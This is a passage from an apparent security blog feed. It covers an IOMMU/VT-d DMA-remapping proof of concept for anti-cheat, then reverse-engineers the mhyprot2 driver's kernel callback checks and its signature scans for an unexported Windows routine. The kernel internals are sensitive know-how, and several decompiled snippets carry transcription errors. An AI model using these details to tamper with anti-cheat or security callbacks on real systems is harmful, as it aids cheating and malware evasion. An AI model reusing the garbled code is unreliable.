    <span class="hljs-keyword">if</span> (pde-&gt;Bits.PageSize != FALSE) {
        *AllocatedPageTable = Split2MbPage(pde);
        <span class="hljs-keyword">if</span> (*AllocatedPageTable == <span class="hljs-literal">NULL</span>) {
            status = STATUS_RESOURCE_NOT_OWNED;
            <span class="hljs-keyword">goto</span> Exit;
        }
    }

    <span class="hljs-comment">// Get the physical address of the page table</span>
    pt = (VTD_SECOND_LEVEL_PAGING_ENTRY*)(((UINT64)pde-&gt;Bits.AddressLo &lt;&lt; <span class="hljs-number">12</span>) |
        ((UINT64)pde-&gt;Bits.AddressHi &lt;&lt; <span class="hljs-number">32</span>));

    <span class="hljs-comment">// Map the page table into kernel virtual address space</span>
    pa.QuadPart = (ULONGLONG)pt;
    pt = (VTD_SECOND_LEVEL_PAGING_ENTRY*)MmMapIoSpaceEx(
        pa, 
        PAGE_SIZE, 
        PAGE_READWRITE | PAGE_NOCACHE
    );

    <span class="hljs-comment">// Update the specific PTE's permissions</span>
    pte = &amp;pt[helper.AsIndex.Pt];
    pte-&gt;Bits.Read = AllowReadWrite;
    pte-&gt;Bits.Write = AllowReadWrite;

    <span class="hljs-comment">// Ensure changes are written to memory</span>
    CPU::WriteBackDataCacheRange(pte, <span class="hljs-keyword">sizeof</span>(*pte));
</code></pre>
<p>The IOMMU hardware maintains its own Translation Lookaside Buffer (IOTLB) which caches address translations and permissions for performance optimization., but when page table entries are modified, these cached values must be explicitly invalidated to ensure the new permissions take immediate effect. The invalidation process is carried out through specific MMIO registers in the IOMMU, particularly the IOTLB Invalidate Register. This register not only triggers the invalidation but also provides granular control over the scope and type of invalidation performed. The invalidation command includes flags for draining both read (DR) and write (DW) requests, ensuring that all in-flight DMA operations complete before the new permissions take effect.</p>
<p>The IIRG (Invalidation Request Granularity) field allows for selective invalidation targeting specific domains or global invalidation of all entries. Furthermore, the hardware implements a handshake mechanism where software must wait for the IVT (Invalidate IOTLB) bit to clear, indicating completion of the invalidation process, before proceeding. This synchronization is crucial because without it, there would be a race condition where DMA operations might still use cached permissions from the old page table entries, potentially bypassing the intended access restrictions.</p>
<pre><code class="lang-cpp"><span class="hljs-keyword">typedef</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> _<span class="hljs-title">VTD_IOTLB_INVALIDATE_REG</span> {</span>
    <span class="hljs-keyword">union</span> {
        <span class="hljs-class"><span class="hljs-keyword">struct</span> {</span>
            UINT64 Reserved1 : <span class="hljs-number">32</span>;           <span class="hljs-comment">// Reserved bits</span>
            UINT64 Domain_Id : <span class="hljs-number">16</span>;           <span class="hljs-comment">// Domain ID for selective invalidation</span>
            UINT64 IIRG : <span class="hljs-number">2</span>;                 <span class="hljs-comment">// Invalidation granularity</span>
            UINT64 Reserved2 : <span class="hljs-number">2</span>;            <span class="hljs-comment">// More reserved bits</span>
            UINT64 DR : <span class="hljs-number">1</span>;                   <span class="hljs-comment">// Drain Reads</span>
            UINT64 DW : <span class="hljs-number">1</span>;                   <span class="hljs-comment">// Drain Writes</span>
            UINT64 Reserved3 : <span class="hljs-number">9</span>;            <span class="hljs-comment">// Additional reserved bits</span>
            UINT64 IVT : <span class="hljs-number">1</span>;                  <span class="hljs-comment">// Invalidate IOTLB</span>
        } Bits;
        UINT64 Uint64;
    };
} VTD_IOTLB_INVALIDATE_REG, *PVTD_IOTLB_INVALIDATE_REG;

<span class="hljs-comment">// Invalidate IOTLB and wait for completion</span>
reg.InvalidateIoTlb(B_IOTLB_REG_IVT | V_IOTLB_REG_IIRG_GLOBAL | V_IOTLB_REG_DR | V_IOTLB_REG_DW);
<span class="hljs-keyword">while</span> ((CPU::MmIoRead&lt;UINT32&gt;(reg.RegisterBase + R_IOTLB_REG) &amp; B_IOTLB_REG_IVT) != <span class="hljs-number">0</span>) {
    _mm_pause();  <span class="hljs-comment">// Wait for invalidation to complete</span>
}
</code></pre>
<p>After <code>ChangePermissionOfPageForAllDevices</code> controls the read/write access rights through the page table entry's permission bits, <code>ChangePointerOfPageForAllDevices</code> extends this protection by actually redirecting the physical address translation in the IOMMU page tables.</p>
<p><code>ChangePointerOfPageForAllDevices</code> implements DMA remapping by modifying the physical address translation within the IOMMU page tables, which allows for transparent redirection of DMA operations from one physical page to another.</p>
<pre><code class="lang-cpp"><span class="hljs-function">EFI_STATUS <span class="hljs-title">ChangePointerOfPageForAllDevices</span><span class="hljs-params">(
    IN OUT DMAR_TRANSLATIONS* Translations,
    IN UINT64 Address,
    IN UINT64 SubstituteAddress,
    OUT VTD_SECOND_LEVEL_PAGING_ENTRY** AllocatedPageTable)</span>
</span>{
    PHYSICAL_ADDRESS pa = { <span class="hljs-number">0</span> };
    EFI_STATUS status;
    ADDRESS_TRANSLATION_HELPER helper;
    VTD_SECOND_LEVEL_PAGING_ENTRY* pde;
    VTD_SECOND_LEVEL_PAGING_ENTRY* pt;
    VTD_SECOND_LEVEL_PAGING_ENTRY* pte;
</code></pre>
<p>The address validation mechanism implements a dual-layer verification process. It first checks if the provided address is a valid virtual address using <code>MmIsAddressValid</code>, and if so, performs the virtual-to-physical translation through <code>Memory::VirtToPhy</code>. This flexibility allows the function to handle both virtual and physical addresses seamlessly while maintaining system security. The <code>ADDRESS_TRANSLATION_HELPER</code> union then decomposes the resulting physical address into its constituent page table indices.</p>
<pre><code class="lang-cpp"><span class="hljs-keyword">if</span> (MmIsAddressValid((PVOID)Address))
    Address = Memory::VirtToPhy((PVOID)Address);

helper.AsUInt64 = Address;
DbgMsg(<span class="hljs-string">"[VT-d] Target 0x%llx at pml4: 0x%llx, pdpt: 0x%llx, pdt: 0x%llx, pt: 0x%llx"</span>,
    helper.AsUInt64,
    helper.AsIndex.Pml4, helper.AsIndex.Pdpt, helper.AsIndex.Pd, helper.AsIndex.Pt);
</code></pre>
<p>The page table manipulation process begins with locating the appropriate Page Directory Entry (PDE) through the calculated indices. When encountering a 2MB large page, indicated by the PageSize bit in the PDE, the function invokes the specialized <code>Split2MbPage</code> operation. This complex procedure allocates a new page table and redistributes the large page mapping into 512 individual 4KB page entries, maintaining consistency throughout the transition.</p>
<pre><code class="lang-cpp">pde = &amp;Translations-&gt;SlPd[helper.AsIndex.Pml4][helper.AsIndex.Pdpt][helper.AsIndex.Pd];
<span class="hljs-keyword">if</span> (pde-&gt;Bits.PageSize != FALSE)
{
    *AllocatedPageTable = Split2MbPage(pde);
    <span class="hljs-keyword">if</span> (*AllocatedPageTable == <span class="hljs-literal">NULL</span>)
    {
        status = STATUS_RESOURCE_NOT_OWNED;
        <span class="hljs-keyword">goto</span> Exit;
    }
}
</code></pre>
<p>The actual address remapping reconstructs the physical address of the page table from the PDE's split address fields, maps it into the kernel's address space using <code>MmMapIoSpaceEx</code> with specific caching attributes, and modifies the target PTE. The substitute address undergoes similar virtual-to-physical translation if necessary, and its lower and upper portions are stored in the PTE's address fields.</p>
<pre><code class="lang-cpp">pt = (VTD_SECOND_LEVEL_PAGING_ENTRY*)(((UINT64)pde-&gt;Bits.AddressLo &lt;&lt; <span class="hljs-number">12</span>) |
    ((UINT64)pde-&gt;Bits.AddressHi &lt;&lt; <span class="hljs-number">32</span>));
pa.QuadPart = (ULONGLONG)pt;
pt = (VTD_SECOND_LEVEL_PAGING_ENTRY*)MmMapIoSpaceEx(pa, PAGE_SIZE, PAGE_READWRITE | PAGE_NOCACHE);
pte = &amp;pt[helper.AsIndex.Pt];

<span class="hljs-keyword">if</span> (MmIsAddressValid((PVOID)SubstituteAddress))
    SubstituteAddress = Memory::VirtToPhy((PVOID)SubstituteAddress);

pte-&gt;Bits.AddressLo = SubstituteAddress &gt;&gt; <span class="hljs-number">12</span>;
pte-&gt;Bits.AddressHi = SubstituteAddress &gt;&gt; <span class="hljs-number">32</span>;
</code></pre>
<p>While some anticheat vendors have used interesting methods to limit attacker visibility into game-related memory regions, such as using CPU paging-based guarded regions (<a target="_blank" href="https://reversing.info/posts/guardedregions/">which Vanguard famously already implements</a>), these methods can easily be bypassed using tools like the <a target="_blank" href="https://www.unknowncheats.me/forum/counterstrike-global-offensive/582688-reading-game-data-using-dma-device-leechcorepyc.html">MemProcFS</a>. But this method is really a proof of concept shitpost rather than anything that could actually be deployed live today in a production environment, alot of driver interactions need to be taken into account before one could truly implement this. But it would be nice if anticheats can stop expecting the worse out of people who want to play fairly.</p>
]]></content:encoded></item><item><title><![CDATA[Smuggling Malware Using HoYoverse Games]]></title><description><![CDATA[Cover Illustration by ireneparamithaa

Hoyoverse, the studio behind some of the most popular games in recent years, has increasingly found itself in the crosshairs of cybercriminals and threat actors. With the company recently securing the title of "...]]></description><link>https://research.meekolab.com/smuggling-malware-using-hoyoverse-games</link><guid isPermaLink="true">https://research.meekolab.com/smuggling-malware-using-hoyoverse-games</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Thu, 26 Sep 2024 11:10:55 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1727349018484/87097601-9547-48f2-ae1a-7ecf74fa09ba.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by ireneparamithaa</em></strong></p>
</blockquote>
<p>Hoyoverse, the studio behind some of the most popular games in recent years, has increasingly found itself in the crosshairs of cybercriminals and threat actors. With the company recently securing the title of "<a target="_blank" href="https://en.wikipedia.org/wiki/List_of_most_expensive_video_games_to_develop">Most Expensive Game to Develop</a>" and repeatedly breaking sales records, it's no surprise that its games have become prime targets. Hoyoverse, or its parent company MiHoYo, depending on the interpretation of its complex corporate structure, has turned into a revenue juggernaut—making it a lucrative focus for attackers.</p>
<p>Despite employing several anticheat solutions—such as MiHoYo Protect (mhyprot), Hoyoverse Kernel Protection (HoYoKProtect), and Tencent's Anti Cheat Expert (ACE)—all have been circumvented by various cheating groups. The games and their supporting anticheat engines have also attracted attention from threat actors seeking to exploit vulnerabilities in their drivers and applications.</p>
<p>In fact, there have been multiple instances of MiHoYo’s game binaries and related applications being leveraged to distribute malware. Below is a brief, albeit non-exhaustive, overview of significant incidents involving MiHoYo’s software being compromised or exploited for malicious purposes.</p>
<h1 id="heading-genshin-impact-vulnerable-driver-rever-ransomware">Genshin Impact Vulnerable Driver (Rever Ransomware)</h1>
<p>In August 2022, TrendMicro <a target="_blank" href="https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html">reported</a> on a Babuk-based ransomware exploit that utilized Genshin Impact's anti-cheat drivers to bypass kernel-level privileges. It was <a target="_blank" href="https://cymulate.com/blog/freeloader-threat-intelligence-analyst-and-malware-researcher-guide/">later found</a> that the note similar to the note given by Rever Ransomware.</p>
<p>While Genshin Impact doesn't feature PvP mechanisms, its stringent monetization structure necessitates robust anti-tampering technologies to ensure the integrity of its random number generation (RNG) systems, thereby safeguarding MiHoYo's monetization model.</p>
<p><code>mhyprot2</code> is a part of miHoYo’s clientside anti-cheat approach. As kernel mode drivers have <em>system-level privilege</em>, these types of anticheat mechanisms often provoke controversy about user’s privacy and with many calling similar systems like Riot’s Vanguard or EasyAntiCheat as rootkits.</p>
<p>Following NT kernel APIs are used in <code>mhyprot2</code>:</p>
<ul>
<li><p>The <code>PsSetCreateProcessNotifyRoutine</code> routine adds a driver-supplied callback routine to, or removes it from, a list of routines to be called whenever a process is created or deleted.</p>
</li>
<li><p>The <code>PsSetCreateThreadNotifyRoutine</code> routine registers a driver-supplied callback that is subsequently notified when a new thread is created and when such a thread is deleted.</p>
</li>
<li><p>The <code>PsSetLoadImageNotifyRoutine</code> routine registers a driver-supplied callback that is subsequently notified whenever an image is loaded (or mapped into memory). This is the routine that we would be discussing.</p>
</li>
</ul>
<p>The advantage of using these hooks is that <code>mhyprot</code> can easily know when any module or component is being mapped to the game process that mhyprot protects. But how about when a piece of malicious code removes mhyprot’s callback routine on the system? There exists a validation routine that makes sure that mhyprot’s callback routine is active on the system.</p>
<pre><code class="lang-c"><span class="hljs-function">BOOLEAN __stdcall <span class="hljs-title">IsLoadImagellotifyRoutineExists</span><span class="hljs-params">()</span>
</span>{
    <span class="hljs-keyword">char</span> *_pPspLoadImageNotifyRoutine; <span class="hljs-comment">// rax </span>
    <span class="hljs-keyword">int</span> Counter2; <span class="hljs-comment">// ebx</span>
    <span class="hljs-keyword">int</span> Counter: <span class="hljs-comment">// esi </span>
    __int64 i; <span class="hljs-comment">// r14 </span>
    <span class="hljs-keyword">char</span> *CallbackBlock; <span class="hljs-comment">// rdi </span>
    __int64 RefCallbackBlock; <span class="hljs-comment">// rdi</span>
    __int64 j; <span class="hljs-comment">// rdx</span>

    _pPspLoadImageNotifyRoutine = (<span class="hljs-keyword">char</span> *)gpPspLoadImageNotifyRoutine;
    Counter2 = <span class="hljs-number">0</span>;
    <span class="hljs-comment">// if gpPspLoadImagellotifyRoutine not set, then set</span>
    <span class="hljs-keyword">if</span> (!gpPspLoadImagellotifyRoutine )
    {
        _pPspLoadImageNotifyRoutine = FindPspRemoveLoadImageNotifyRoutine_sub_140006B240);
        gpPspLoadImageNotifyRoutine = (__int64)_pPspLoadImageNotifyRoutine;
        <span class="hljs-keyword">if</span> ( !_pPspLoadImagellotifyRoutine )
            <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;
    }
    Counter = <span class="hljs-number">0</span>;
    <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0164</span>; ; i += <span class="hljs-number">8164</span> )
    {
        CallbackBlock = &amp;_pPspLoadImage lotifyRoutine[il;
        <span class="hljs-keyword">if</span> (&amp;_pPspLoadImageNotifyRoutine[i])
            <span class="hljs-keyword">break</span>;
ContinueEnumeration:
    <span class="hljs-comment">// Every callback-block arrays have up to 64 of its size</span>
    <span class="hljs-keyword">if</span> ( (<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span>)++Counter &gt;= <span class="hljs-number">64</span> )
        <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
    }
    <span class="hljs-keyword">if</span>(!(<span class="hljs-keyword">unsigned</span> __int8)mIsAddressValid(&amp;_pPspLoadImageNotifyRoutine[i])
        || (RefCallbackBlock = *(_QWORD *)CallbackBlock) == <span class="hljs-number">0</span>
        || !(<span class="hljs-keyword">unsigned</span> _int8)NmIsAddressValid(RefCallbackBlock)
        || *(<span class="hljs-keyword">void</span> (__fastcall **)(__int64, __int64))((RefCallbackBlock &amp; OxFFFFFFFFFFFFFFFOui64) + <span class="hljs-number">8</span>) != MhyLoadImageCallback )
    {
        _pPspLoadImageNotifyRoutine = (<span class="hljs-keyword">char</span> *)gpPspLoadImageNotifyRoutine;
        <span class="hljs-keyword">goto</span> ContinueEnumeration;
    }

    <span class="hljs-comment">// validate pointer</span>
    <span class="hljs-keyword">for</span> (j = <span class="hljs-number">0164</span>; *(_DWORD *)((<span class="hljs-keyword">char</span> *)&amp;unk_14000A638 + j) == *(_DWORD *)((<span class="hljs-keyword">char</span> *)MhyLoadImageCallback + j); j += <span class="hljs-number">4164</span> )
    {
        <span class="hljs-keyword">if</span> ( (<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span>)++Counter2 &gt;= <span class="hljs-number">8</span> )
        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;    
    }
    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
}
</code></pre>
<p>To safeguard against potential tampering, <code>mhyprot2</code> implements a validation routine that ensures its callback routine remains active on the system. The detection logic first checks if the global pointer to <code>PspLoadImageNotifyRoutine</code> is set. If not set, it attempts to find and set it using a custom function. It then iterates through the callback blocks (up to 64 entries), validating each callback block and checking if it matches mhyprot's callback function pointer.</p>
<p>The process begins by obtaining the <code>PspLoadImageNotifyRoutine</code> array pointer using the <code>FindPspRemoveLoadImageNotifyRoutine_sub_140006B24</code> function. The system then meticulously enumerates through each callback-block entry, validating each one. If a match is found with mhyprot's callback function pointer, the function returns <code>TRUE</code>, indicating that the callback is still active and unaltered.</p>
<p>However, if no match is found after examining all entries, the function returns <code>FALSE</code>. This <code>FALSE</code> return could signify either that the callback was intentionally removed by malicious code attempting to bypass the anti-cheat system, or that it was never properly registered in the first place.</p>
<h3 id="heading-dkom-countermeasures">DKOM Countermeasures</h3>
<p>To counter potential Direct Kernel Object Manipulation (DKOM) attacks, a technique often employed by malware to conceal processes or drivers, mhyprot2 implements a sophisticated signature scanning mechanism. This approach allows the anti-cheat system to locate specific function or variable pointers crucial to its operation</p>
<p><code>PspLoadImageNotifyRoutine</code> is not exported by <code>ntoskrnl</code> due to Microsoft never recommending DKOM methods for device drivers. Instead, <code>mhyprot2</code> uses <code>FindPspRemoveLoadImageNotifyRoutine_sub_140006B24</code>.</p>
<pre><code class="lang-c">RtlInitUnicodeString(&amp;DestinationString,<span class="hljs-string">L"PsRemoveLoadImagellotifyRoutine"</span>);
pPsRemoveLoadImagellotifyRoutine=(<span class="hljs-keyword">char</span>*)MmGatSystamRoutinaAddress(&amp;DestinationString);
StubBase=pPsRemoveLoadImageNotifyRoutine;
<span class="hljs-keyword">if</span>(pPsRemoveLoadImagellotifyRoutine)
{
    <span class="hljs-keyword">if</span> ( (<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span>)gWinVer &gt;= <span class="hljs-number">61</span>
    {
        <span class="hljs-keyword">if</span> ( (<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span>)gWinVer &lt;= <span class="hljs-number">63</span> )     <span class="hljs-comment">// Windows Vista « 8.1</span>
        {
            MaxAddressToSearch = (<span class="hljs-keyword">unsigned</span> _int64)(pPsRemoveLoadImageNotifyRoutine + <span class="hljs-number">255</span>);
            <span class="hljs-keyword">while</span> ((<span class="hljs-keyword">unsigned</span> __int64)StubBase &lt; MaxAddressToSearch)
            {
                <span class="hljs-keyword">if</span> ( *StubBase == <span class="hljs-number">0x48</span>
                  &amp;&amp; StubBase[<span class="hljs-number">1</span>] == <span class="hljs-number">0x8D</span>u
                  &amp;&amp; StubBase[<span class="hljs-number">2</span>] == OxD
                  &amp;&amp; StubBase[<span class="hljs-number">7</span>] == <span class="hljs-number">0x8B</span>u
                  &amp;&amp; StubBase[<span class="hljs-number">8</span>] == Oxc6u )
                {
                DerefPointer = &amp;StubBase[*( DWORD *)(StubBase + <span class="hljs-number">3</span>) + <span class="hljs-number">7</span>]:
ValidateAndReturn:
                <span class="hljs-keyword">if</span> ( DerefPointer &amp;&amp; (<span class="hljs-keyword">unsigned</span> __int8)MmIsAddressValid(DerefPointer))
                    <span class="hljs-keyword">goto</span> LABEL_26;
                <span class="hljs-keyword">break</span>;
            }
            ++StubBase;
        }
    }
    <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> ( gWinver == <span class="hljs-number">100</span> )    <span class="hljs-comment">// Windows 10 (Major=19, Minor=0)</span>
    {
        <span class="hljs-keyword">for</span> (i = (<span class="hljs-keyword">unsigned</span> __int64) (pPsRemoveLoadImageNotifyRoutine + <span class="hljs-number">12</span>);
             i &lt; (<span class="hljs-keyword">unsigned</span> ._int64) (pPsRemoveLoadImageNotifyRoutine + <span class="hljs-number">255</span>);
             ++i )
    {
    <span class="hljs-keyword">if</span> (*( BYTE *)(i - <span class="hljs-number">2</span>) == <span class="hljs-number">0x33</span>
        &amp;&amp; * ( BYTE *)(i + <span class="hljs-number">1</span>) == <span class="hljs-number">0x8D</span>u
        &amp;&amp; * ( BYTE *)(i - <span class="hljs-number">9</span>) == <span class="hljs-number">0x44</span>
        &amp;&amp; * ( BYTE *)(i - <span class="hljs-number">10</span>) == <span class="hljs-number">0x66</span>
        &amp;&amp; * ( BYTE *)(i + <span class="hljs-number">11</span>) == <span class="hljs-number">0x48</span> )
    {
        DerefPointer = (<span class="hljs-keyword">char</span> *)(i + *( DWORD *)(: + <span class="hljs-number">3</span>) + <span class="hljs-number">7</span>);
        <span class="hljs-keyword">goto</span> ValidateAndReturn;
    }
   }
  }
 }
     DerefPointer = Oi64:
</code></pre>
<p>The driver first obtains the address of <code>PsRemoveLoadImageNotifyRoutine</code> using the <code>MmGetSystemRoutineAddress</code> function. This serves as the starting point for the scan. The system then scans a range of memory starting from the address of <code>PsRemoveLoadImageNotifyRoutine</code> and extending 255 bytes (0xFF in hexadecimal) beyond it. This range is chosen because the <code>PspLoadImageNotifyRoutine</code> array is typically located within this vicinity.</p>
<p>If a match for the signature pattern is found within this range, mhyprot2 dereferences the address, performs validation checks, and if successful, returns this address as the location of the <code>PspLoadImageNotifyRoutine</code> array. In the event that no matching pattern is found within the specified range, the system falls back to returning the function pointer of <code>PsRemoveLoadImageNotifyRoutine</code> itself.</p>
<p>But the methodology varies depending on the Windows version in use. For Windows 7 through 8.1, mhyprot2 searches for the pattern <code>\x48\x8D\x0D\x00\x00\x00\x00\x8B\xC6</code>, using the mask <code>xxx????xx</code>. This corresponds to the instruction <code>lea rcx, PspLoadImageNotifyRoutine</code> followed by <code>mov eax, esi</code>.</p>
<p>For Windows 10 and later, it uses a different pattern: <code>\x48\x66\x44\x00\x00\x00\x00\x00\x00\x33\x00\x00\x8D</code>, with the mask <code>xxx??????x??x</code>. This pattern identifies a nearby instruction sequence unique to newer Windows versions.</p>
<p>These byte sequences serve as fingerprints for locating the <code>PspLoadImageNotifyRoutine</code> array in memory.</p>
<pre><code class="lang-c">PAGE:<span class="hljs-number">0000000140</span>CAD62    lea     rcx, PspLoadImageNotifyRoutine
PAGE:<span class="hljs-number">0000000140</span>CAD69    lea     rbp, [rcx+rdi*<span class="hljs-number">8</span>]
PAGE:<span class="hljs-number">0000000140</span>CAD70    mov     rcx, rbp
PAGE:<span class="hljs-number">0000000140</span>CAD73    call    ExReferenceCallBackBlock
PAGE:<span class="hljs-number">0000000140</span>CAD78    mov     rbx, rax
PAGE:<span class="hljs-number">0000000140</span>CAD7B    test    rax, rax
PAGE:<span class="hljs-number">0000000140</span>CAD7E    jz      <span class="hljs-keyword">short</span> loc_140CAD9F
PAGE:<span class="hljs-number">0000000140</span>CAD80    cmp     [rax+<span class="hljs-number">8</span>], r14
PAGE:<span class="hljs-number">0000000140</span>CAD84    jnz     <span class="hljs-keyword">short</span> loc_140CAD94
PAGE:<span class="hljs-number">0000000140</span>CAD86    mov     r8, rax
PAGE:<span class="hljs-number">0000000140</span>CAD89    <span class="hljs-keyword">xor</span>     edx, edx
PAGE:<span class="hljs-number">0000000140</span>CAD8B    mov     rcx, rbp
PAGE:<span class="hljs-number">0000000140</span>CAD8E    call    ExCompareExchangeCallBack
PAGE:<span class="hljs-number">0000000140</span>CAD93    test    al, al
</code></pre>
<p>The code first locates a specific callback within the array using an index. It then employs a careful process to safely reference and potentially modify the callback. This involves using <code>ExReferenceCallBackBlock</code> to ensure the callback isn't deallocated during the operation, followed by a integrity check comparing the callback to an expected value.</p>
<p>If the integrity check passes, the code prepares to modify the callback using <code>ExCompareExchangeCallBack</code>. This function likely performs an atomic compare-and-exchange operation, allowing for thread-safe modification of the callback.</p>
<h3 id="heading-windows-version-detection">Windows Version Detection</h3>
<p>Since of course <code>ntoskrnl</code> is different on every version of Windows, the driver needs to verify which version of windows they’re running on by <code>gWinVer</code> which set by <code>GetAndSetGlobalVersionVariable</code>.</p>
<pre><code class="lang-cpp"><span class="hljs-function"><span class="hljs-keyword">char</span> <span class="hljs-title">GetAndSetGlobalVersionVariable</span><span class="hljs-params">()</span>
</span>{
    <span class="hljs-keyword">int</span> minorVersion; <span class="hljs-comment">// [rsp+30h] [rbp+8h]</span>
    <span class="hljs-keyword">int</span> majorVersion; <span class="hljs-comment">// [rsp+38h] [rbp+10h]</span>

    <span class="hljs-keyword">if</span> ( gwinVer )
        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;
    majorVersion = <span class="hljs-number">0</span>;
    minorVersion = <span class="hljs-number">0</span>;
    PsGetVersion (&amp;majorVersion, &amp;minorVersion, <span class="hljs-number">0</span>i64, <span class="hljs-number">0</span>i64);
    <span class="hljs-keyword">if</span> (majorVersion == <span class="hljs-number">5</span> )
    {
        <span class="hljs-keyword">if</span> (minorVersion == <span class="hljs-number">1</span> )
        {
        gWinVer = <span class="hljs-number">51</span>;
        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;
        }
    }
    <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (majorVersion == <span class="hljs-number">6</span> )             <span class="hljs-comment">// Windows Vista - 8.1</span>
    {
        <span class="hljs-keyword">switch</span> ( minorVersion )
        {
          <span class="hljs-keyword">case</span> <span class="hljs-number">1</span>:
            gWinVer = <span class="hljs-number">61</span>;
            <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;
          <span class="hljs-keyword">case</span> <span class="hljs-number">2</span>:
            gWinVer = <span class="hljs-number">62</span>;
            <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;
          <span class="hljs-keyword">case</span> <span class="hljs-number">3</span>:
            gWinVer = <span class="hljs-number">63</span>;
            <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;
        }
    }
    <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (majorVersion == <span class="hljs-number">10</span> &amp;&amp; !minorVersion )
    {
        gWinVer = <span class="hljs-number">100</span>;
        <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;
    }
gwinVer = <span class="hljs-number">0</span>;
<span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
</code></pre>
<p>The function begins by checking if a global version variable (<code>gWinVer</code>) has already been set. If it has, the function immediately returns, avoiding redundant version checks. This approach optimizes performance by ensuring the potentially time-consuming version detection process occurs only once during the driver's operation.</p>
<p>If the global version variable hasn't been set, the function proceeds to use the <code>PsGetVersion</code> API. This API call retrieves the major and minor version numbers of the operating system. Interestingly, mhyprot2 uses <code>PsGetVersion</code> despite it being considered obsolete after Windows XP, having been replaced by <code>RtlGetVersion</code> in more recent Windows versions.</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td>majorVersion</td><td>minorVersion</td><td>gWinVer</td><td>Product</td></tr>
</thead>
<tbody>
<tr>
<td>5</td><td>1</td><td>51</td><td>Windows XP</td></tr>
<tr>
<td>6</td><td>1</td><td>61</td><td>Windows 7</td></tr>
<tr>
<td>6</td><td>2</td><td>62</td><td>Windows 8</td></tr>
<tr>
<td>6</td><td>3</td><td>63</td><td>Windows 8.1</td></tr>
<tr>
<td>10</td><td>0</td><td>100</td><td>Windows 10</td></tr>
</tbody>
</table>
</div><p>If the detected version doesn't match any of these known configurations, <code>gWinVer</code> is set to 0, likely indicating an unknown or unsupported Windows version.</p>
<p>The choice to use <code>PsGetVersion</code> might be driven by compatibility concerns. It's possible that the developers of mhyprot2 wanted to ensure their anti-cheat system could function on a wide range of Windows versions, including older systems that might still be in use in some markets. This backward compatibility could be particularly important in regions where older hardware and operating systems remain prevalent.</p>
<h3 id="heading-validation-routine">Validation Routine</h3>
<p>he Validation Routine is a critical component of mhyprot2's integrity checking mechanism. This routine is designed to ensure that all the anti-cheat system's protective measures remain active and uncompromised during the game's operation. The routine is implemented through a function that we can refer to as <code>CheckForAllCallbacks</code>.</p>
<pre><code class="lang-cpp"><span class="hljs-function"><span class="hljs-keyword">bool</span> <span class="hljs-title">CheckForAllCallbacks</span><span class="hljs-params">()</span>
</span>{
    <span class="hljs-keyword">return</span> !GetAndSetGlobalVersionVariable()
    || IsgpPspLoadImageNotifyRoutineValid()
    &amp;&amp; IsLoadImageNotifyRoutineExist()
    &amp;&amp; IsProcessCreateNotifyRoutineExist()
    &amp;&amp; IsCreateThreadNotifyRoutineExist()
}
</code></pre>
<p>This function performs a series of checks to validate the integrity of various callback routines essential to mhyprot2's operation. Let's examine each component of this validation process:</p>
<ol>
<li><p><code>GetAndSetGlobalVersionVariable()</code>: This call ensures that the Windows version has been properly detected and set. If this function returns true (indicating a failure in version detection), the overall check fails immediately.</p>
</li>
<li><p><code>IsgpPspLoadImageNotifyRoutineValid()</code>: This check verifies the validity of the global pointer to the PspLoadImageNotifyRoutine. It's crucial for ensuring that the system can properly monitor image loading events.</p>
</li>
<li><p><code>IsLoadImageNotifyRoutineExist()</code>: This function confirms that the Load Image Notify Routine is still registered and active. This routine is vital for detecting when new modules or DLLs are loaded into the game process.</p>
</li>
<li><p><code>IsProcessCreateNotifyRoutineExist()</code>: This check ensures that the Process Create Notify Routine is still in place. This routine allows mhyprot2 to monitor the creation of new processes, which is essential for detecting potential cheat launchers or injectors.</p>
</li>
<li><p><code>IsCreateThreadNotifyRoutineExist()</code>: This function verifies that the Create Thread Notify Routine is active. This routine enables mhyprot2 to monitor thread creation, which is crucial for detecting certain types of code injection techniques.</p>
</li>
</ol>
<p>The function returns true only if all these checks pass (note the use of logical AND operators), indicating that all necessary callback routines are in place and functioning as expected. If any of these checks fail, it could indicate that the anti-cheat system has been compromised or disabled in some way.</p>
<pre><code class="lang-cpp"><span class="hljs-function">NTSTATUS <span class="hljs-title">MhyChecksumForever</span><span class="hljs-params">()</span>
</span>{
    <span class="hljs-keyword">unsigned</span> __int64 v0; <span class="hljs-comment">// rbx </span>
    <span class="hljs-keyword">char</span> Dest; <span class="hljs-comment">// [rsp+30h] [rbp-Doh]</span>
    <span class="hljs-keyword">char</span> v3; <span class="hljs-comment">// [rsp+168h] [rbp+68h] </span>
    <span class="hljs-keyword">int</span> v4; <span class="hljs-comment">// [rsp+170h] [rbp+70h]</span>
    <span class="hljs-keyword">int</span> v5; <span class="hljs-comment">// [rsp+178h] [rbp+78h]</span>

    v0 = <span class="hljs-number">1</span>i64;
    sub_1400014E0();
    v4 = <span class="hljs-number">1</span>;
    _InterlockedCompareExchange(<span class="hljs-number">6</span>v4, <span class="hljs-number">-1</span>, dword_14000A6E8);
    <span class="hljs-keyword">while</span> ( v4 != <span class="hljs-number">-1</span> )
    {
        v5 = <span class="hljs-number">0</span>;
